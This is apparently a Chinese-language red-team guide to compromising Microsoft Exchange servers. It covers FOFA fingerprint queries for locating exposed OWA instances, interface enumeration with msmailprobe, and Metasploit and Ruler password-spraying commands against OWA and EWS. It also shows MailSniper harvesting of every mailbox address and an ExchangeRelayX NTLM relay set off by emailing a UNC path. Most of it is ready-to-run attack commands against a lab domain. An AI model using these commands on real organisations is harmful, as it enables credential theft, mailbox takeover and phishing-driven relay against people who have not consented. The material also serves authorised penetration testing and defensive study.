Exchange版本识别 #
1. 访问OWA 登录页面
https://目标/owa
2. 右键源码,记住版本号为15.1.1713
3. 访问网站
经对比版本为2016 cu12
Fofa搜集exchange #
针对于exchange每个版本fofa也可以帮我们快速收集。该搜索规则不是从header、body、title中进行搜索。但结果就是挺准的
exchange粗略指纹
较准确 title="Outlook Web App" body="/owa/auth/" body="/themes/resources/segoeui-semilight.ttf" #不太准 title="Exchange"
个版本指纹
#exchange 2010 app="Microsoft-Exchange-2010-POP3-server-version-03.1" || app="Microsoft-Exchange-Server-2010" #exchange 2013 app="Microsoft-Exchange-2013" || app="Microsoft-Exchange-Server-2013-CU21" || app="Microsoft-Exchange-Server-2013-CU17" | |app="Microsoft-Exchange-Server-2013-CU23"||app="Microsoft-Exchange-Server-2013-CU13" || app="Microsoft-Exchange-Server-2013-CU22" || app="Microsoft-Exchange-Server-2013-CU11" || app="Microsoft-Exchange-Server-2013-CU2" ||app="Microsoft-Exchange-Server-2013-CU16" || app="Microsoft-Exchange-Server-2013-CU19" || app="Microsoft-Exchange-Server-2013-CU3" || app="Microsoft-Exchange-Server-2013-CU18" ||app="Microsoft-Exchange-Server-2013-CU5" || app="Microsoft-Exchange-Server-2013-CU20" || app="Microsoft-Exchange-Server-2013-CU12" || app="Microsoft-Exchange-Server-2013-CU15" || app="Microsoft-Exchange-Server-2013-CU10" || app="Microsoft-Exchange-Server-2013-CU9" || app="Microsoft-Exchange-Server-2013-CU6" || app="Microsoft-Exchange-Server-2013-CU7" || app="Microsoft-Exchange-Server-2013-CU1" || app="Microsoft-Exchange-Server-2013-CU14" || app="Microsoft-Exchange-Server-2013-CU8" || app="Microsoft-Exchange-Server-2013-RTM" || app="Microsoft-Exchange-Server-2013-SP1" || app="Microsoft-Exchange-2013" #exchange 2016(会显示规则不存在) app="Microsoft-Exchange-Server-2016-CU19" || app="Microsoft-Exchange-Server-2016-CU3" || app="Microsoft-Exchange-Server-2016-CU12" || app="Microsoft-Exchange-Server-2016-RTM" || app="Microsoft-Exchange-Server-2016-CU7" || app="Microsoft-Exchange-Server-2016-CU17" || app="Microsoft-Exchange-Server-2016-CU2" || app="Microsoft-Exchange-Server-2016-CU1" || app="Microsoft-Exchange-Server-2016-CU14" || app="Microsoft-Exchange-Server-2016-CU5" || app="Microsoft-Exchange-Server-2016-CU11" || app="Microsoft-Exchange-Server-2016-CU9" || app="Microsoft-Exchange-Server-2016-CU16" || app="Microsoft-Exchange-Server-2016-CU10" || app="Microsoft-Exchange-Server-2016-CU6" || app="Microsoft-Exchange-Server-2016-CU13" || app="Microsoft-Exchange-Server-2016-CU18" || app="Microsoft-Exchange-Server-2016-CU8" || app="Microsoft-Exchange-Server-2016-CU4" || app="Microsoft-Exchange-2016-POP3-server" #exchange 2019 app="Microsoft-Exchange-Server-2019-CU5"||app="Microsoft-Exchange-Server-2019-CU3"||app="Microsoft-Exchange-Server-2019-Preview"||app="Microsoft-Exchange-Server-2019-CU8"||app="Microsoft-Exchange-Server-2019-CU1"||app="Microsoft-Exchange-Server-2019-CU7"||app="Microsoft-Exchange-Server-2019-CU2"||app="Microsoft-Exchange-Server-2019-CU6"||app="Microsoft-Exchange-Server-2019-RTM"||app="Microsoft-Exchange-Server-2019-CU4"
SPN定位内网Exchange服务器 #
setspn -Q IMAP/* | findstr "exchange"
msmailprobe 搜集Exchange接口 #
获取Exchange的接口和登录入口
git clone https://github.com/busterb/msmailprobe.git cd msmailprobe/ go build msmailprobe.go ./msmailprobe identify -t exchange服务器主机名.域名
在域外时需要先添加 vim /etc/hosts
./msmailprobe identify -t mail.test.lab
识别出了易进行账号枚举的地址,以及暴露的一些口
exchange登陆口密码喷洒 #
msf对owa登陆口进行密码喷洒 #
当我们获取了获取Exchange的接口和登录入口,可以使用msf进行密码喷洒,需准备账号密码字典。在实际的密码喷洒过程中线程尽可能调到最低,宁愿慢、准、稳,也不要快、急、错
use auxiliary/scanner/http/owa_login set USER_FILE ./user.txt set PASS_FILE ./pass.txt set StoP_ON_SUCCESS false run
msf对ews进行密码喷洒 #
Exchange Web Service,是 exchange 提供的一套API编程接口,用于操作 exchange相关功能,对于ews接口我们也可以进行爆破密码喷洒。
但是此页面就算输入正确的邮箱,貌似也无法登陆
但是通过爆破此页面,我们也能获取到正确的邮箱账号密码
use auxiliary/scanner/http/owa_ews_login set rhosts 192.168.10.6 set user_file ./user.txt set PASS_FILE ./pass.txt set stop_on_success false run
mailsniper.ps1获取exchange所有邮箱用户 #
MailSniper 是一种渗透测试工具,用于在 Microsoft Exchange 环境中通过电子邮件搜索特定术语(密码、内部情 报、网络架构信息等)。它可以用作非管理员用户来搜索自己的电子邮件,也可以由 Exchange 管理员使用来搜索域中每个用户的邮箱。
MailSniper 还包括用于密码喷洒、枚举用户和域、从 OWA 和 EWS 收集全局地址列表 (GAL) 以及检查组织中每个 Exchange 用户的邮箱权限的附加模块。
项目地址:
收集邮箱,为后续爆破准备
使用前提
- 掌握其中一个用户邮箱的账户密码,并可以登录outlook
- 在域用户登录之后才能执行该ps1
如我们登录了一个普通域用户,并且获取了一个邮箱账号和密码(demo demo.com)可以登录outlook
powershell -exec bypass Import-Module .\MailSniper.ps1 Get-GlobalAddressList -ExchHostname outlook地址 -UserName 域用户名 -Password 已知的邮箱密码 -OutFile 导出结果.txt Get-GlobalAddressList -ExchHostname mail.test.lab -UserName demo -Password demo.com # -ExchHostname:ping -a exchange服务器ip -> 得到主机名 -> 主机名.域名(mail.test.lab)
导出了所有邮箱
使用 Ruler 对内网 Exchange 邮箱用户进行密码喷洒 #
Ruler 可用于从 Linux 、Windows 或 MacOSX 执行密码喷射,因为它是跨平台的。如上面获取到邮箱号后可以执行密码喷洒
项目:
ruler-win64.exe --domain test.lab -k brute --users userlist.txt --passwords pass.txt --delay 0 --threads 10 -v
参考:
使用 ExchangeRelayX 对内网 Exchange 进行 Relay #
Microsoft Exchange 支持很多服务,比如ActiveSync 、EWS 、OWA 等。其中一些服务 (MAPI 、RPC 和 EWS) 默认支持 NTLM 身份验证,那么就有可能让红队人员进行 NTLM Relay Attack
ExchangeRelayX 用于展示攻击者对本地 Microsoft Exchange 服务器上的 EWS 端点执行基于 SMB 或 HTTP 的 NTLM 中继攻击以破坏受害者邮箱的能力。该工具为攻击者提供了一个看起来像 OWA 的界面,可以访问用户的邮箱和联系人
下载地址:
#使用 exchangeRelayx.py 脚本来验证 Exchange Server 是否支持 NTLM 身份验证: python3 exchangeRelayx.py -c -t https://192.168.10.6 # -t 参数指的是 Exchange 服务器的 IP 地址 #但是我这里脚本执行不了
- 验证exchange服务是否执行ntlm身份验证
- 支持则直接进行 Relay Attack 。exchangeRelayx.py -t https://192.168.10.6 ,会在本地开8000端口的web服务器监听,只要 Relay 成功就会在页面上显示成功的用户
- 发送带unc路径的邮件给exchange,只要点击就会relay
